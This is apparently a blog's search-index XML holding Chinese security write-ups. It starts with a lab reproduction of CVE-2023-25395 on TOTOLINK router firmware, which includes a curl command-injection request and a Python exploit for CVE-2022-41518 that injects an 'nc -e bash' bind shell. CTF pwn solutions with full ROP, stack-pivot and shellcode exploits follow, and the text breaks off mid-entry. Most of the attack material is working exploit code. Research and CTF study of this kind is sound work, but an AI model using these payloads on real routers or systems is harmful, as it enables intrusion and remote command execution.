-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlocal-search.xml
358 lines (165 loc) · 550 KB
/
local-search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>CVE-2023-25395复现</title>
<link href="/2025/01/15/CVE-2023-25395%E5%A4%8D%E7%8E%B0/"/>
<url>/2025/01/15/CVE-2023-25395%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="CVE-2023-25395复现"><a href="#CVE-2023-25395复现" class="headerlink" title="CVE-2023-25395复现"></a>CVE-2023-25395复现</h1><p>固件下载地址:<a href="http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html">http://totolink.net/home/menu/detail/menu_listtpl/download/id/185/ids/36.html</a></p><p>影响版本</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251313748.png" alt="image-20230925131341626"></p><p>漏洞是位于/usr/lib/lighttpd/web/cgi-bin的cstecgi.cgi程序</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251314399.png" alt="image-20230925131446362"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251314970.png" alt="image-20230925131450914"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251314444.png" alt="image-20230925131455421"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315724.png" alt="image-20230925131503658"></p><h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>通过字符串setOpenVpnCertGenerationCfg,再通过ou传参最终可以实现命令注入(揭露者的poc是有问题的,他是批量提交都使用的是第一个的图片和方法,这个cve的poc最后是无法打通的),所以最后maur师傅最后另外找了一个方法,来实现命令注入</p><p>,但最后效果是一样的</p><p>首先是通过strstr函数将var指向输入的setOpenVpnCertGenerationCfg字符串,接着是v22指向off_44F048如果为空就指向最下面程序结束,接着将v42指向var即指向输入的字符串,接着将v42与v41不断进行比较,不同则将v41+0x44寻找下一个比较的字符串,相同则将v22指向v41+0x40(注意这里ida分析的伪代码是有问题的,实际实现起来也是有问题的),即指向0x4327fc。</p><p>接着进入这个函数,程序通过获取ou参数下的内容传递给v14,之后将v14带入到Uci_Set_Str函数中,在Uci_Set_Str函数中,通过snprintf函数,将a4匹配到的内容格式化进v11,之后将v11带入cstesystem函数中,函数直接将用户输入内容带入到execv函数中,实现命令注入</p><h2 id="固件模拟"><a href="#固件模拟" class="headerlink" title="固件模拟"></a>固件模拟</h2><p>一开始尝试了两个自动化工具,我尝试了FirmAE,maur师傅尝试了Firmadyne,最后发现都不行(因为是要给qemu制定cpu参数)</p><p>所以最后决定使用qemu系统级模拟,一开始尝试的是使用buildroot编译内核和文件系统,但是由于我这里出现了一堆玄学问题和buildroot编译的mipsel32缺少很多东西(例如ssh),所以最后我使用了debian官网的debian_wheezy_mipsel_standard.qcow2和debian_wheezy_mipsel_standard.qcow2</p><h3 id="1-启动qemu"><a href="#1-启动qemu" class="headerlink" title="1.启动qemu"></a>1.启动qemu</h3><p>这里得配置网络,以及指定这个固件的cpu参数</p><p>启动脚本:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-comment">#set network</span><br><span class="hljs-attribute">sudo</span> brctl addbr virbr0<br><span class="hljs-attribute">sudo</span> ifconfig virbr0 <span class="hljs-number">192.168.182.1</span>/<span class="hljs-number">24</span> up<br><span class="hljs-attribute">sudo</span> tunctl -t tap0<br><span class="hljs-attribute">sudo</span> ifconfig tap0 <span class="hljs-number">192.168.182.11</span>/<span class="hljs-number">24</span> up<br><span class="hljs-attribute">sudo</span> brctl addif virbr0 tap0<br><br><span class="hljs-attribute">qemu</span>-system-mipsel -M malta -kernel vmlinux-<span class="hljs-number">3</span>.<span class="hljs-number">2</span>.<span class="hljs-number">0</span>-<span class="hljs-number">4</span>-<span class="hljs-number">4</span>kc-malta-el -cpu <span class="hljs-number">24</span>KEc -hda debian_wheezy_mipsel_standard.qcow2 -append <span class="hljs-string">"root=/dev/sda1"</span> -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic<br></code></pre></td></tr></table></figure><h3 id="2-将固件的文件系统传进qemu虚拟机"><a href="#2-将固件的文件系统传进qemu虚拟机" class="headerlink" title="2.将固件的文件系统传进qemu虚拟机"></a>2.将固件的文件系统传进qemu虚拟机</h3><p>用debian官网的确实要方便一点,可以直接使用ssh传进来</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elixir">scp -r squashfs-root/ root<span class="hljs-variable">@192</span>.<span class="hljs-number">168.182</span>.<span class="hljs-number">12</span><span class="hljs-symbol">:/root</span><br></code></pre></td></tr></table></figure><h3 id="3-启动固件的web服务"><a href="#3-启动固件的web服务" class="headerlink" title="3.启动固件的web服务"></a>3.启动固件的web服务</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">chroot A7100RU <span class="hljs-regexp">/bin/</span>sh<br>.<span class="hljs-regexp">/usr/</span>sbin<span class="hljs-regexp">/lighttpd -f /</span>etc<span class="hljs-regexp">/lighttpd/</span>lighttpd.conf -D<br></code></pre></td></tr></table></figure><p>这样使用浏览器访问192.168.182.12就可以查看到浏览器的页面了,貌似是因为使用qemu模拟的原因和路由器真机还是有一定的偏差,导致js出了些问题无法完整的显示页面,但是并不影响复现这个cve</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315617.png" alt="image-20230925131510509"></p><h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>可以直接使用bp传参,也可以使用curl传递post参数,这里我使用的是curl</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">curl</span> http://<span class="hljs-number">192.168.182.12</span>/cgi-bin/cstecgi.cgi -X POST -d '{<span class="hljs-string">"topicurl"</span>:<span class="hljs-string">"setOpenVpnCertGenerationCfg"</span>,<span class="hljs-string">"ou"</span>:<span class="hljs-string">"1$(ls>/tmp/256.txt;)"</span>}'<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315378.png" alt="image-20230925131517333"></p><p>上图可以看到是有回显的,并且通过ssh连入qemu虚拟机也可以发现成功写入了/tmp/256.txt文件</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251315680.png" alt="image-20230925131521625"></p><h2 id="CVE-2022-41518-这个模拟的方式和前面也没差太多,漏洞也是一个命令注入,主要还是从exp学了点东西"><a href="#CVE-2022-41518-这个模拟的方式和前面也没差太多,漏洞也是一个命令注入,主要还是从exp学了点东西" class="headerlink" title="CVE-2022-41518 这个模拟的方式和前面也没差太多,漏洞也是一个命令注入,主要还是从exp学了点东西"></a>CVE-2022-41518 这个模拟的方式和前面也没差太多,漏洞也是一个命令注入,主要还是从exp学了点东西</h2><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">import</span> contextlib<br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> os<br><br><span class="hljs-keyword">session</span> = requests.<span class="hljs-keyword">Session</span>()<br>login_url = "http://192.168.182.12/formLoginAuth.htm?authCode=1&userName=admin&goURL=home.html&action=login"<br>raw = <span class="hljs-keyword">session</span>.<span class="hljs-keyword">get</span>(login_url, timeout=<span class="hljs-number">5</span>)<br><br>inject_url = "http://192.168.182.12/cgi-bin/cstecgi.cgi"<br>inject_data = {<br> "proto":"8",<br> "hostname":"';nc -l -p 9999 -e bash;'",<br> "topicurl":"setOpModeCfg"<br>}<br><br><span class="hljs-keyword">with</span> contextlib.suppress(<span class="hljs-keyword">Exception</span>):<br> resp = <span class="hljs-keyword">session</span>.post(inject_url, <span class="hljs-type">json</span> = inject_data, timeout=<span class="hljs-number">1</span>)<br>print("shell!? ---------------> ")<br>os.<span class="hljs-keyword">system</span>("nc 192.168.182.12 9999")<br></code></pre></td></tr></table></figure><p>命令注入主要是在hostname的处理,同样是sprintf的问题,然后通过nc -l -p 9999 -e bash就可以拿到shell了</p>]]></content>
</entry>
<entry>
<title>强网拟态初赛pwn部分wp</title>
<link href="/2024/10/28/%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81/"/>
<url>/2024/10/28/%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81/</url>
<content type="html"><![CDATA[<p>运气还行 进决赛了</p><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="signin"><a href="#signin" class="headerlink" title="signin"></a>signin</h2><p>套了个随机数绕过的栈迁移</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./vuln"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br><span class="hljs-attribute">libc1</span>=cdll.LoadLibrary("./libc.so.6")<span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 0<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(<span class="hljs-string">"pwn-0e0144d48f.challenge.xctf.org.cn"</span>, 9999, <span class="hljs-attribute">ssl</span>=<span class="hljs-literal">True</span>)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br><span class="hljs-attribute">pop_rdi</span>=0x0000000000401893<br><span class="hljs-attribute">puts_plt</span>=elf.plt[<span class="hljs-string">'puts'</span>]<br><span class="hljs-attribute">puts_got</span>=elf.got[<span class="hljs-string">'puts'</span>]<br><span class="hljs-attribute">ret</span>=0x000000000040101a<br><span class="hljs-attribute">pop_rbp</span>=0x000000000040127d<br><span class="hljs-attribute">vuln</span>=0x00000000004013C0<br><span class="hljs-attribute">read_ptr</span>=0x00000000004013CF<br><span class="hljs-attribute">leave_ret</span>=0x00000000004013be<br><br><span class="hljs-attribute">payload</span>=b'A'*0x12<br>s(payload)<br><br>libc1.srand(0x41414141)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(100):<br> <span class="hljs-attribute">num</span>=libc1.rand() %100 + 1 <br> <span class="hljs-built_in">print</span>(num)<br> ru(<span class="hljs-string">"Input the authentication code:"</span>)<br> s(p64(num))<br><br>ru(<span class="hljs-string">">>"</span>)<br>sl(p32(1))<br>ru(<span class="hljs-string">"Note:"</span>)<br>sl(b<span class="hljs-string">'youlin'</span>)<br><br><span class="hljs-attribute">payload</span>=b'A'*0x100+b'A'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)<br>sl(payload)<br>io.recv()<br><span class="hljs-attribute">libcbase</span>=u64(io.recv(6).ljust(8,b'\x00'))-0x84420<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><span class="hljs-attribute">pop_rsi</span>=libcbase+0x000000000002601f<br><span class="hljs-attribute">pop_rdx</span>=libcbase+0x0000000000142c92<br><br><span class="hljs-attribute">payload</span>=b'A'*0x100+p64(elf.bss(0x400)+0x100)+p64(read_ptr)<br>sl(payload)<br><br><span class="hljs-attribute">orw</span>=p64(pop_rdi)+p64(0x404538)+p64(pop_rsi)+p64(0)+p64(open)<br>orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(read)<br>orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(write)+b<span class="hljs-string">'flag\x00'</span><br><br><span class="hljs-attribute">payload</span>=orw+p64(pop_rbp)+p64(elf.bss(0xb48))+p64(read)<br><span class="hljs-attribute">payload</span>=payload.ljust(0x100,b'\x00')+p64(elf.bss(0x400)-0x8)+p64(leave_ret)<br>s(payload)<br><br><br>ia()<br></code></pre></td></tr></table></figure><h2 id="signin-revenge"><a href="#signin-revenge" class="headerlink" title="signin_revenge"></a>signin_revenge</h2><p>和上面一题差不多,直接有栈迁移</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./vuln"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 0<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(<span class="hljs-string">"pwn-30cffcb888.challenge.xctf.org.cn"</span>, 9999, <span class="hljs-attribute">ssl</span>=<span class="hljs-literal">True</span>)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br><span class="hljs-attribute">pop_rdi</span>=0x0000000000401393<br><span class="hljs-attribute">ret</span>=0x000000000040101a<br><span class="hljs-attribute">puts_plt</span>=elf.plt[<span class="hljs-string">'puts'</span>]<br><span class="hljs-attribute">puts_got</span>=elf.got[<span class="hljs-string">'puts'</span>]<br><span class="hljs-attribute">vuln</span>=0x00000000004012C0<br><span class="hljs-attribute">leave_ret</span>=0x00000000004012be<br><span class="hljs-attribute">read_ptr</span>=0x0000000004012CF<br><span class="hljs-attribute">pop_rbp</span>=0x000000000040117d<br><br>ru(<span class="hljs-string">"lets move and pwn!"</span>)<br><span class="hljs-attribute">payload</span>=b'A'*0x100+b'A'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)<br>sl(payload)<br>io.recv()<br><span class="hljs-attribute">libcbase</span>=u64(io.recv(6).ljust(8,b'\x00'))-0x84420<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><span class="hljs-attribute">pop_rsi</span>=libcbase+0x000000000002601f<br><span class="hljs-attribute">pop_rdx</span>=libcbase+0x0000000000142c92<br><br><span class="hljs-attribute">payload</span>=b'A'*0x100+p64(elf.bss(0x400)+0x100)+p64(read_ptr)<br>sl(payload)<br><br><span class="hljs-attribute">orw</span>=p64(pop_rdi)+p64(0x4044f8)+p64(pop_rsi)+p64(0)+p64(open)<br>orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(read)<br>orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(write)+b<span class="hljs-string">'flag\x00'</span><br><br><span class="hljs-attribute">payload</span>=orw+p64(pop_rbp)+p64(elf.bss(0xb48))+p64(read)<br><span class="hljs-attribute">payload</span>=payload.ljust(0x100,b'\x00')+p64(elf.bss(0x400)-0x8)+p64(leave_ret)<br>s(payload)<br><br><br><br>ia()<br></code></pre></td></tr></table></figure><h2 id="ezcode"><a href="#ezcode" class="headerlink" title="ezcode"></a>ezcode</h2><p>套了个json的短shellcode</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./vuln"</span><br>elf = ELF(banary)<br><span class="hljs-comment"># libc = ELF("./libc.so.6")</span><br>libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(<span class="hljs-string">"pwn-ba1369d43c.challenge.xctf.org.cn"</span>, <span class="hljs-number">9999</span>, ssl=<span class="hljs-literal">True</span>)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io,<span class="hljs-string">"b *$rebase(0x00000000000018A6)"</span>)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>shellcode=<span class="hljs-string">b'c1e70c66ba070066b80a000f059931c089ce31ff0f05'</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(<span class="hljs-built_in">len</span>(shellcode)))<br>payload=<span class="hljs-string">b'{"shellcode":"'</span>+shellcode+<span class="hljs-string">b'"}'</span><br>sl(payload)<br><br>shellcode = asm(<span class="hljs-string">'''</span><br><span class="hljs-string"> mov rdi,0x999800d</span><br><span class="hljs-string"> xor esi,esi</span><br><span class="hljs-string"> xor rdx,rdx</span><br><span class="hljs-string"> xor rax,rax</span><br><span class="hljs-string"> add rax,2</span><br><span class="hljs-string"> syscall</span><br><span class="hljs-string"> mov rdi,rax</span><br><span class="hljs-string"> mov rsi,0x9998000+0x250</span><br><span class="hljs-string"> add edx,0x100</span><br><span class="hljs-string"> xor eax,eax</span><br><span class="hljs-string"> syscall</span><br><span class="hljs-string"> mov edi,1</span><br><span class="hljs-string"> mov rsi,0x9998000+0x250</span><br><span class="hljs-string"> mov rax,1</span><br><span class="hljs-string"> syscall</span><br><span class="hljs-string"> '''</span>)<br>sl(<span class="hljs-string">b'flag\x00'</span>.ljust(<span class="hljs-number">9</span>,<span class="hljs-string">b'\x00'</span>)+shellcode)<br><br>ia()<br></code></pre></td></tr></table></figure><h2 id="qwen"><a href="#qwen" class="headerlink" title="qwen"></a>qwen</h2><p>套麻了,有溢出 抬下rsp然后执行rop,然后用pwn2复制一下flag到flag_read,就可以直接读flag_read读出flag了</p><figure class="highlight python"><table><tr><td 